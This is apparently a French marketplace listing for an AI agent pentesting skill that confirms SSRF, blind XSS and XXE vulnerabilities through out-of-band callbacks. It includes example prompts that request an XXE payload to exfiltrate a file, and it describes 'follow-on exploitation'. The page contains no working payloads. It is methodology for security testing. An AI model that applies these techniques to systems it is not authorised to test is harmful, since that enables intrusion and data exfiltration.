Notre avis
Compétence de test de sécurité pour valider les interactions sortantes et les rappels hors bande (OOB), comme les callbacks SSRF, les beacons XSS aveugles ou les interactions DNS.
Points forts
- Génération d'identifiants de corrélation uniques par test pour éviter les faux positifs.
- Validation déterministe des interactions asynchrones avec horodatage et contexte source.
- Support de multiples vecteurs : SSRF, XSS aveugle, XXE OOB, webhooks.
Limites
- Nécessite un serveur d'écoute externe configuré et accessible.
- Peut être affecté par le bruit réseau ambiant si la corrélation n'est pas rigoureuse.
- Ne convient pas aux vulnérabilités entièrement en bande sans besoin de callback.
Utilisez cette compétence lorsque vous devez prouver une interaction serveur asynchrone via un callback externe (SSRF aveugle, XSS aveugle, XXE OOB).
Ne l'utilisez pas pour des exploits entièrement en bande (réponse directe) ou pour des révisions de code statique sans interaction réseau.
Analyse de sécurité
SûrThe skill describes a methodology for outbound interaction correlation in pentesting without providing any executable commands or dangerous actions. It is purely analytical and poses no direct execution risk.
Aucun point d'attention détecté
Exemples
I need to test a potential SSRF vulnerability in a web application that fetches user-provided URLs. Generate unique callback tokens and send a request to my OOB listener. Confirm if a callback is received and correlate it with the payload.I suspect a blind XSS in a feedback form. Create a payload with a unique identifier that will cause the browser to make a request to my callback server. Monitor for any incoming requests and confirm the XSS if a callback with the correct token arrives.Test an XML parser for XXE vulnerabilities using OOB techniques. Craft an XML payload that triggers an outbound HTTP request to my listener, exfiltrating a known file content. Validate the callback and extract the data.name: pentest-outbound-interaction-oob-detection description: "Security assessment skill for outbound interaction and out-of-band (OOB) validation. Use when prompts include SSRF callback confirmation, blind XSS beacons, webhook abuse, XXE/OOB behavior, DNS/HTTP callback correlation, or asynchronous server-side interaction proof. Do not use when vulnerabilities are fully in-band and require no external callback correlation."
Outbound Interaction & OOB Detection
Activation Triggers (Positive)
ssrf callbackblind xsswebhook abuseoobdns interactionasynchronous callbackxxe out of band
Exclusion Triggers (Negative)
fully in-band exploitstatic code review onlyreport drafting only
Output Schema
- Callback correlation table:
token,payload path,timestamp,source context - Validation verdict:
confirmed,not confirmed,inconclusive - Follow-on exploitation opportunities from confirmed outbound behavior
Instructions
- Generate unique per-test correlation identifiers before sending payloads.
- Ensure callback listener scope and retention are sufficient for delayed events.
- Correlate callbacks by token, path, and time window before confirmation.
- Differentiate noisy background traffic from test-linked interactions.
- Use control payloads to reduce false positives.
- Pass confirmed primitives to exploit or logic skills with full correlation evidence.
Should Do
- Treat OOB validation as evidence discipline, not only payload dispatch.
- Preserve immutable callback logs for auditability.
- Include both positive and negative control outcomes.
Should Not Do
- Do not claim confirmation without deterministic correlation.
- Do not reuse tokens across unrelated tests.
- Do not expose real secrets in callback payloads.
Auditeur de Securite
Securite
Analyse le code pour detecter les vulnerabilites OWASP Top 10.
Checklist de Sécurité OWASP
Securite
Génère des checklists de sécurité applicative basées sur l'OWASP Top 10.
Modélisation de Menaces
Securite
Génère des documents de modélisation de menaces avec analyse STRIDE.